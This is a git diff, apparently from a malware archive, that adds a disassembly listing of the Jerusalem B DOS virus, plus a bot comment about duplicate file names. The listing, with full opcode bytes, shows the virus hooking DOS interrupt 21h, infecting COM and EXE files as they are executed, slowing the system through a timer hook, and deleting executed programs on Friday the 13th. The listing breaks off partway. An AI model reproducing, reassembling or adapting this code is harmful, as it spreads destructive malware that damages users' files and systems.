PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV 
AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? 
DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL 
+0000:06CF 0000 ADD [BX+SI],AL +0000:06D1 0000 ADD [BX+SI],AL +0000:06D3 0000 ADD [BX+SI],AL +0000:06D5 0000 ADD [BX+SI],AL +0000:06D7 0000 ADD [BX+SI],AL +0000:06D9 005718 ADD [BX+018H],DL +0000:06DC 0825 OR [DI],AH +0000:06DE A5 MOVSW +0000:06DF FEC5 INC CH +0000:06E1 07 POP ES +0000:06E2 1E PUSH DS +0000:06E3 0210 ADD DL,[BX+SI] +0000:06E5 07 POP ES +0000:06E6 57 PUSH DI +0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH +0000:06EB 0104 ADD [SI],AX +0000:06ED 7F70 JG X075F + +"JV.MOC" PAGE 0014 + +0000:06EF 0010 ADD [BX+SI],DL +0000:06F1 07 POP ES +0000:06F2 1D001C SBB AX,01C00H +0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP +0000:06F9 0C1B OR AL,01BH +0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH] +0000:06FF F24D REPNE DEC BP +0000:0701 360E PUSH CS +0000:0703 0300 ADD AX,[BX+SI] +0000:0705 0000 ADD [BX+SI],AL +0000:0707 00EE ADD DH,CH +0000:0709 002A X0709: ADD [BP+SI],CH +0000:070B 0F POP CS +0000:070C 42 INC DX +0000:070D 01C1 ADD CX,AX +0000:070F 0DB44C OR AX,04CB4H +0000:0712 B000 MOV AL,00H +0000:0714 CD21 X0714: INT 021H +0000:0716 4D DEC BP +0000:0717 7344 JAE X075D +0000:0719 6F73 JG X078E + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru-s.lst b/MSDOS/Virus.MSDOS.Unknown.jeru-s.lst new file mode 100644 index 00000000..556a184d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jeru-s.lst 
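Review bot: The new Virus.MSDOS.Unknown.jeru-s.asm is a disassembler listing rather than assemblable source — page headers such as `"JV.MOC" PAGE 0001`, address and opcode columns, `??? DI` and `; NOT VALID` markers, and a first line reading "This is the Jerusalem B Virus." inside a file named jeru-s — so both the `.asm` extension and the name mislabel what the file holds. Its blob id `556a184d` is the same one the jeru-s.lst header directly below records, so those two files are byte-identical, and the tail of the preceding file visible above this hunk matches this listing line for line, which suggests the same listing was added more than twice under different names. Keeping a single copy under the `.lst` name with a one-line header naming the source listing, the tool that produced it and the variant it belongs to would let the archive be de-duplicated and indexed by hash instead of by filename.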
@@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP 
[BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV 
CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV 
AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H 
+0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H 
+0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 
MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 
MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 